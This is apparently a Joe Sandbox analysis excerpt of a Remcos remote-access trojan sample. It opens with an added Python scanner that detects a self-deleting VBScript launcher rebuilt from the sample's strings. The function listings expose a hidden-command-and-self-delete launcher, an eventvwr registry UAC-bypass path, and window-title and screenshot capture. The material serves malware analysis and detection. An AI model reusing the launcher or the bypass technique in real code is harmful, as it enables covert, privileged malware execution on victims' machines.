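The String ID line of this record carries the two parts of a dropped launcher script: `CreateObject("WScript.Shell").Run "cmd /c ""` with its closing `""", 0` (window style 0, hidden), and `CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)`, which removes the script by its own path. Together with the `.vbs` and `Temp` strings, the ShellExecuteW "open" call and the ExitProcess that follows, this is a self-deleting VBScript launcher that the sample writes to the Temp directory and starts before exiting. The Python below is an added example written for this report, not Joe Sandbox or Remcos code: it turns the two fragments into patterns, extracts the hidden command, and scans a directory for such launchers. The sample script text and paths are constructed from the fragments, not copied from a dropped file.

```python
"""Scanner for the self-deleting VBScript launcher whose fragments appear in
the record above.  Added example for this report; not Joe Sandbox or Remcos
code.  The sample script text below is constructed from the recovered
fragments, not copied from a dropped file."""
import os
import re
import tempfile
from pathlib import Path
from typing import Dict, List, Optional

# Fragment 1: WScript.Shell.Run "cmd /c ""<command>""", 0  (window style 0 = hidden).
# In VBScript a doubled quote inside a string literal is an escaped quote.
RUN_HIDDEN_RE = re.compile(
    r'CreateObject\("WScript\.Shell"\)\.Run\s+"cmd /c ""(?P<cmd>.*?)""",\s*0',
    re.IGNORECASE)
# Fragment 2: the script deletes itself by its own full path.
SELF_DELETE_RE = re.compile(
    r'CreateObject\("Scripting\.FileSystemObject"\)\.DeleteFile\(Wscript\.ScriptFullName\)',
    re.IGNORECASE)


def analyse_vbs(text: str) -> Dict[str, object]:
    """Extract the hidden command (VBScript quote escapes undone) and whether
    the script removes itself."""
    m = RUN_HIDDEN_RE.search(text)
    cmd = m.group("cmd").replace('""', '"') if m else None
    return {"hidden_cmd": cmd, "self_deletes": bool(SELF_DELETE_RE.search(text))}


def is_self_deleting_launcher(text: str) -> bool:
    """True when both fragments are present: the script runs a hidden command
    and then deletes itself, as in the record above."""
    result = analyse_vbs(text)
    return result["hidden_cmd"] is not None and bool(result["self_deletes"])


def scan_temp(directory: Optional[str] = None) -> List[str]:
    """Return paths of .vbs files in %TEMP% (or the given directory) that match."""
    base = Path(directory or os.environ.get("TEMP") or tempfile.gettempdir())
    hits: List[str] = []
    for path in base.glob("*.vbs"):
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue
        if is_self_deleting_launcher(text):
            hits.append(str(path))
    return hits


# Constructed from the fragments in the record; the executable path is made up.
SAMPLE_VBS = (
    'CreateObject("WScript.Shell").Run "cmd /c ""C:\\Users\\u\\AppData\\Local\\Temp\\sample.exe""", 0\r\n'
    'CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\r\n'
)
BENIGN_VBS = 'MsgBox "hello"\r\n'

if __name__ == "__main__":
    print(analyse_vbs(SAMPLE_VBS))
    print(scan_temp())
```

Because the script deletes itself as soon as it runs, the file is short-lived on disk; the same two patterns are more reliably applied to the script content captured by a file-creation monitor or to the wscript.exe command line and its child cmd.exe in process telemetry.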
                        APIs
                        • connect.WS2_32(?,?,?), ref: 004048C0
                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049E0
                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049EE
                        • WSAGetLastError.WS2_32 ref: 00404A01
                          • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateEvent$ErrorLastLocalTimeconnect
                        • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                        • API String ID: 994465650-2151626615
                        • Opcode ID: b56ab407b7d85cc5e8983cef37c9724a1f5c45cc3ea0a996f87df1f4b9ef746f
                        • Instruction ID: f1749a2af40dec866484330b2464a30bcc7489b9f615ba144f2b3c776ade1d80
                        • Opcode Fuzzy Hash: b56ab407b7d85cc5e8983cef37c9724a1f5c45cc3ea0a996f87df1f4b9ef746f
                        • Instruction Fuzzy Hash: 37412AB5B406017BD608777A8E1B96E7625AB81304B50017FF901136D2EBBD9C2197DF
                        APIs
                          • Part of subcall function 00452A89: CreateFileW.KERNEL32(?,00000008,00000007,d.E,?,?,00000000,?,00452E64,00000000,0000000C), ref: 00452AA6
                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00452ECF
                        • __dosmaperr.LIBCMT ref: 00452ED6
                        • GetFileType.KERNEL32(00000000), ref: 00452EE2
                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00452EEC
                        • __dosmaperr.LIBCMT ref: 00452EF5
                        • CloseHandle.KERNEL32(00000000), ref: 00452F15
                        • CloseHandle.KERNEL32(00000000), ref: 0045305F
                        • GetLastError.KERNEL32 ref: 00453091
                        • __dosmaperr.LIBCMT ref: 00453098
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                        • String ID: H
                        • API String ID: 4237864984-2852464175
                        • Opcode ID: 474c31a6c8ccfba43807a2a750eddd9e1d52ca803bebdbe2fa86fef5e1c33935
                        • Instruction ID: def4621c7e831d5678052e1043e56ea9e2bfce8be848437acb5cac56d61a7e39
                        • Opcode Fuzzy Hash: 474c31a6c8ccfba43807a2a750eddd9e1d52ca803bebdbe2fa86fef5e1c33935
                        • Instruction Fuzzy Hash: CAA15832A101049FDF19EF68D8417AE7BB1AB0A325F14015FFC419B392DB798D1ACB5A
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 65535$udp
                        • API String ID: 0-1267037602
                        • Opcode ID: 28a355c3c2c5299b67e9df14989e725b3f395b8ff7de4f3ce545a5dea485fe56
                        • Instruction ID: 74e44cdacc71272d4b4fe4479ff5a2c38cc960f39e0e81ce023821ae7ff597b0
                        • Opcode Fuzzy Hash: 28a355c3c2c5299b67e9df14989e725b3f395b8ff7de4f3ce545a5dea485fe56
                        • Instruction Fuzzy Hash: 3151F1F5209302ABD7209E15C809BBB77D4AB84B52F08842FF8A1973D0D76CDEC0965E
                        APIs
                        • __Init_thread_footer.LIBCMT ref: 00409C81
                        • Sleep.KERNEL32(000001F4), ref: 00409C8C
                        • GetForegroundWindow.USER32 ref: 00409C92
                        • GetWindowTextLengthW.USER32(00000000), ref: 00409C9B
                        • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 00409CCF
                        • Sleep.KERNEL32(000003E8), ref: 00409D9D
                          • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,00000000,0040A156,00000000), ref: 0040965A
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                        • String ID: [${ User has been idle for $ minutes }$]
                        • API String ID: 911427763-3954389425
                        • Opcode ID: a44f1e588b244d76f3851291f59a3d8a0f12b55ab3dd92a15c41ef104020a1a6
                        • Instruction ID: 7a62ae1493acfbf190be1d0992f15f5c774c3bdccfea44e4f2dca48363f02a21
                        • Opcode Fuzzy Hash: a44f1e588b244d76f3851291f59a3d8a0f12b55ab3dd92a15c41ef104020a1a6
                        • Instruction Fuzzy Hash: 7C5193716043405BD304FB61D855A6EB795AF84308F50093FF486A62E3DF7CAE45C69A
                        APIs
                        • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040C753
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: LongNamePath
                        • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                        • API String ID: 82841172-425784914
                        • Opcode ID: 611eacb1f2b12eabfa35ce51232d41e6553fe8371d81c53e9ab5b340c3cd037e
                        • Instruction ID: e0747f7f0ded3e76473395fd4b63a7f1dfd4675be44f898a7a0c8db3d1efc66a
                        • Opcode Fuzzy Hash: 611eacb1f2b12eabfa35ce51232d41e6553fe8371d81c53e9ab5b340c3cd037e
                        • Instruction Fuzzy Hash: EB4168315042419AC204FB62DC929EFB7E8AEA4759F10063FF541720E2EF799E49C99F
                        APIs
                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00438632
                        • GetLastError.KERNEL32(?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043863F
                        • __dosmaperr.LIBCMT ref: 00438646
                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00438672
                        • GetLastError.KERNEL32(?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043867C
                        • __dosmaperr.LIBCMT ref: 00438683
                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D35,?), ref: 004386C6
                        • GetLastError.KERNEL32(?,?,?,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004386D0
                        • __dosmaperr.LIBCMT ref: 004386D7
                        • _free.LIBCMT ref: 004386E3
                        • _free.LIBCMT ref: 004386EA
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                        • String ID:
                        • API String ID: 2441525078-0
                        • Opcode ID: 754b37205d6cd88dea2e57a046153fac0b2c26eaf77bc51e198666fb1f449e95
                        • Instruction ID: 210192a7601cd99409c426d56dfac4e8df60f1af96207b6eb293af60208c7bc2
                        • Opcode Fuzzy Hash: 754b37205d6cd88dea2e57a046153fac0b2c26eaf77bc51e198666fb1f449e95
                        • Instruction Fuzzy Hash: 4E31B17280030ABBDF11AFA5DC469AF7B69AF08325F10425EF81056291DF39CD11DB69
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free
                        • String ID: pF$tF
                        • API String ID: 269201875-2954683558
                        • Opcode ID: 0017408d32ff71f8327e26c25c7248eb33913fce7ae2350609d9814c511e4433
                        • Instruction ID: 6443803da38cddfc03973e112e1470be20db66c409a4168417c9ccfa39c85508
                        • Opcode Fuzzy Hash: 0017408d32ff71f8327e26c25c7248eb33913fce7ae2350609d9814c511e4433
                        • Instruction Fuzzy Hash: 1261D5B5D00205AFEB20CF69C841BAABBF4EF05B14F15416BE944EB381E7749D41DB58
                        APIs
                        • SetEvent.KERNEL32(?,?), ref: 0040549F
                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040554F
                        • TranslateMessage.USER32(?), ref: 0040555E
                        • DispatchMessageA.USER32(?), ref: 00405569
                        • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00471F10), ref: 00405621
                        • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405659
                          • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                        • String ID: CloseChat$DisplayMessage$GetMessage
                        • API String ID: 2956720200-749203953
                        • Opcode ID: 38da9913c1d94b4fc4e25114756b75ad617155bf13c772cc5ff9b28bcc7bf55c
                        • Instruction ID: 0f013d79663c92f7c21c274702d2b8200e9ba5951f20e13ff122dbd33ecc2bba
                        • Opcode Fuzzy Hash: 38da9913c1d94b4fc4e25114756b75ad617155bf13c772cc5ff9b28bcc7bf55c
                        • Instruction Fuzzy Hash: 8B41C471A043016BCB00FB75DC5A86F77A9EB85714B40093EF946A31D2EF79C905CB9A
                        APIs
                          • Part of subcall function 0041626A: __EH_prolog.LIBCMT ref: 0041626F
                        • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00463050), ref: 0041611A
                        • CloseHandle.KERNEL32(00000000), ref: 00416123
                        • DeleteFileA.KERNEL32(00000000), ref: 00416132
                        • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 004160E6
                          • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                        • String ID: <$@$@%G$@%G$Temp
                        • API String ID: 1704390241-4139030828
                        • Opcode ID: 2c1979de410b9738e481fa727b302a0dd89e2ec540be45fee9571ea6700d777e
                        • Instruction ID: 980de7e6e99344695fa922fac5fad97fc57b46ec9d0f9c422bd6bd0d3fbbc04a
                        • Opcode Fuzzy Hash: 2c1979de410b9738e481fa727b302a0dd89e2ec540be45fee9571ea6700d777e
                        • Instruction Fuzzy Hash: 48419131900209ABDB14FB61DC56AEEB739AF50308F50417EF505760E2EF785E8ACB99
                        APIs
                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041843C,00000000), ref: 00418AD2
                        • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041843C,00000000), ref: 00418AE9
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418AF6
                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041843C,00000000), ref: 00418B05
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B16
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B19
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Service$CloseHandle$Open$ControlManager
                        • String ID:
                        • API String ID: 221034970-0
                        • Opcode ID: c0ea185af2b6cb95e5d246b028910c14a7565b46c2d114a674b25013468a4f31
                        • Instruction ID: 27c4ffebcf7932a5624e60d5a3802e7503a1161fac6a42b5cc64803f4be6ae02
                        • Opcode Fuzzy Hash: c0ea185af2b6cb95e5d246b028910c14a7565b46c2d114a674b25013468a4f31
                        • Instruction Fuzzy Hash: A211E9715002186FD610EF64DC89CFF3B6CDF41B96741012AFA0593192DF789D469AF5
                        APIs
                        • _free.LIBCMT ref: 00445645
                          • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                          • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                        • _free.LIBCMT ref: 00445651
                        • _free.LIBCMT ref: 0044565C
                        • _free.LIBCMT ref: 00445667
                        • _free.LIBCMT ref: 00445672
                        • _free.LIBCMT ref: 0044567D
                        • _free.LIBCMT ref: 00445688
                        • _free.LIBCMT ref: 00445693
                        • _free.LIBCMT ref: 0044569E
                        • _free.LIBCMT ref: 004456AC
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
                        • Instruction ID: 08dc7793ba969bb8ae61e50cce6790fa76a3b05f45cdd3d63b195ce4761959f1
                        • Opcode Fuzzy Hash: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
                        • Instruction Fuzzy Hash: A511CB7610010CBFDB01EF55C986CDD3B65FF04759B4284AAFA885F222EA35DF509B88
                        APIs
                        • __EH_prolog.LIBCMT ref: 00417F6F
                        • GdiplusStartup.GDIPLUS(00471668,?,00000000), ref: 00417FA1
                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041802D
                        • Sleep.KERNEL32(000003E8), ref: 004180B3
                        • GetLocalTime.KERNEL32(?), ref: 004180BB
                        • Sleep.KERNEL32(00000000,00000018,00000000), ref: 004181AA
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                        • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                        • API String ID: 489098229-3790400642
                        • Opcode ID: 27953ccb73c7935c50ce76e498ac53549bd0f641fbc99231dbf637836dbf8ac1
                        • Instruction ID: ff50de85f816598f14f139fcbfe24147e98e2bb745fd097185ef2e944e73ca26
                        • Opcode Fuzzy Hash: 27953ccb73c7935c50ce76e498ac53549bd0f641fbc99231dbf637836dbf8ac1
                        • Instruction Fuzzy Hash: 98516071A001549BCB04BBB5C8529FD76A8AF55308F04403FF805A71E2EF7C5E85C799
                        APIs
                        • Sleep.KERNEL32(00001388), ref: 00409738
                          • Part of subcall function 0040966D: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
                          • Part of subcall function 0040966D: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
                          • Part of subcall function 0040966D: Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
                          • Part of subcall function 0040966D: CloseHandle.KERNEL32(00000000,?,?,?,00409745), ref: 004096E6
                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409774
                        • GetFileAttributesW.KERNEL32(00000000), ref: 00409785
                        • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040979C
                        • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409816
                          • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                        • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00469654,00000000,00000000,00000000), ref: 0040991F
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                        • String ID: H"G$H"G
                        • API String ID: 3795512280-1424798214
                        • Opcode ID: 13e2dbf3d5e885c0786faa6bc9ba80587d0ab8a2a4bc2c59858fca73f58dbc4d
                        • Instruction ID: 85d6828eff9e87111454ffe40de9a07a949f8ec8799fb43d86416e8e02d17308
                        • Opcode Fuzzy Hash: 13e2dbf3d5e885c0786faa6bc9ba80587d0ab8a2a4bc2c59858fca73f58dbc4d
                        • Instruction Fuzzy Hash: 9D513D712043015BCB14BB72C9A6ABF76999F90308F00453FB946B72E3DF7D9D09869A
                        APIs
                        • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,004541DF), ref: 00453107
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        • API ID: DecodePointer
                        • String ID: acos$asin$exp$log$log10$pow$sqrt
                        • API String ID: 3527080286-3064271455
                        • Opcode ID: f53d904abd5658a060f413a89978d0306c3294a3021a30185663c10ae64f840c
                        • Instruction ID: 9333e61b372fbf41addd7e909d3efe481a8fa84217f9852f3907f1ba123c2b47
                        • Opcode Fuzzy Hash: f53d904abd5658a060f413a89978d0306c3294a3021a30185663c10ae64f840c
                        • Instruction Fuzzy Hash: CC518F30900909DBCF10DFA8E9480ADBBB0FF0A347F644196EC81A7216CB799A1DDB1D
                        APIs
                        • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00415A1A
                          • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                        • Sleep.KERNEL32(00000064), ref: 00415A46
                        • DeleteFileW.KERNEL32(00000000), ref: 00415A7A
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        • API ID: File$CreateDeleteExecuteShellSleep
                        • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                        • API String ID: 1462127192-2001430897
                        • Opcode ID: c216d361bb9ef99ebd7f865ddf1f7fdade912dea526e25dca7a569b2ba1e0d71
                        • Instruction ID: 7fbd65b43d39327dc9f625a99f058064c4c6325298edc9245ab65683dcac2845
                        • Opcode Fuzzy Hash: c216d361bb9ef99ebd7f865ddf1f7fdade912dea526e25dca7a569b2ba1e0d71
                        • Instruction Fuzzy Hash: FA315E719402199ACB04FBA1DC96DEE7768EF50308F40017FF506731E2EE785E8ACA99
                        APIs
                        • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 00406775
                        • ExitProcess.KERNEL32 ref: 00406782
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        • API ID: ExecuteExitProcessShell
                        • String ID: H"G$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
                        • API String ID: 1124553745-1488154373
                        • Opcode ID: 8e5fad59d86c60b71b0e885ed10285bbf14514be7c7ad01d69b843f0820051ef
                        • Instruction ID: 062031feec86e4e4641db6525c6f69cb17b792298443eef288e26788f9a4eac4
                        • Opcode Fuzzy Hash: 8e5fad59d86c60b71b0e885ed10285bbf14514be7c7ad01d69b843f0820051ef
                        • Instruction Fuzzy Hash: 36110571A4420166D704B7A2DC57FEF32689B10B09F50003FF906B61D2EEBC5A4982DE
                        APIs
                        • AllocConsole.KERNEL32(00000001), ref: 0041AA5D
                        • ShowWindow.USER32(00000000,00000000), ref: 0041AA76
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        • API ID: AllocConsoleShowWindow
                        • String ID: * BreakingSecurity.net$ * Remcos v$--------------------------$--------------------------$3.8.0 Pro$CONOUT$
                        • API String ID: 4118500197-4025029772
                        • Opcode ID: 613498324cd6a8c522b436d369b4391aab2e08fe6d6e431343eccbd2d6afca2c
                        • Instruction ID: 07661f9972e693547954b0fc743ee20e91627884e026026f5b86345d1a8b50cd
                        • Opcode Fuzzy Hash: 613498324cd6a8c522b436d369b4391aab2e08fe6d6e431343eccbd2d6afca2c
                        • Instruction Fuzzy Hash: CE015271D803586ADB10EBF59C06FDF77AC6B18708F54142BB100A7095E7FC950C4A2D
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041B22B
                          • Part of subcall function 0041B2C4: RegisterClassExA.USER32(00000030), ref: 0041B310
                          • Part of subcall function 0041B2C4: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
                          • Part of subcall function 0041B2C4: GetLastError.KERNEL32 ref: 0041B335
                        • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041B262
                        • lstrcpynA.KERNEL32(00471AF8,Remcos,00000080), ref: 0041B27C
                        • Shell_NotifyIconA.SHELL32(00000000,00471AE0), ref: 0041B292
                        • TranslateMessage.USER32(?), ref: 0041B29E
                        • DispatchMessageA.USER32(?), ref: 0041B2A8
                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041B2B5
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                        • String ID: Remcos
                        • API String ID: 1970332568-165870891
                        • Opcode ID: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
                        • Instruction ID: 392c2ce23d615fe7cfca65c1bdf78dc563e79c4ff08160ae13be93183ad442b8
                        • Opcode Fuzzy Hash: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
                        • Instruction Fuzzy Hash: CD013971901308ABCB10DBB9ED4EEDB7BBCFB85B05F40417AF51992061D7B89489CB68
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d7410a98b278d9d25d0fcdc47fb7c960ad5f7d9b58d6d06d1c87314e37a5ed65
                        • Instruction ID: 53180985ac70b1d9c95f382170f9691aec8243d5c40cf1d2be039b65846bfc46
                        • Opcode Fuzzy Hash: d7410a98b278d9d25d0fcdc47fb7c960ad5f7d9b58d6d06d1c87314e37a5ed65
                        • Instruction Fuzzy Hash: 2DC12970D44245AFEB11DFA8D841BEEBBB0BF19304F04419AE844A7392C7798D51DB6B
                        APIs
                        • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045123C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0045100F
                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 00451092
                        • __alloca_probe_16.LIBCMT ref: 004510CA
                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,0045123C,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 00451125
                        • __alloca_probe_16.LIBCMT ref: 00451174
                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 0045113C
                          • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 004511B8
                        • __freea.LIBCMT ref: 004511E3
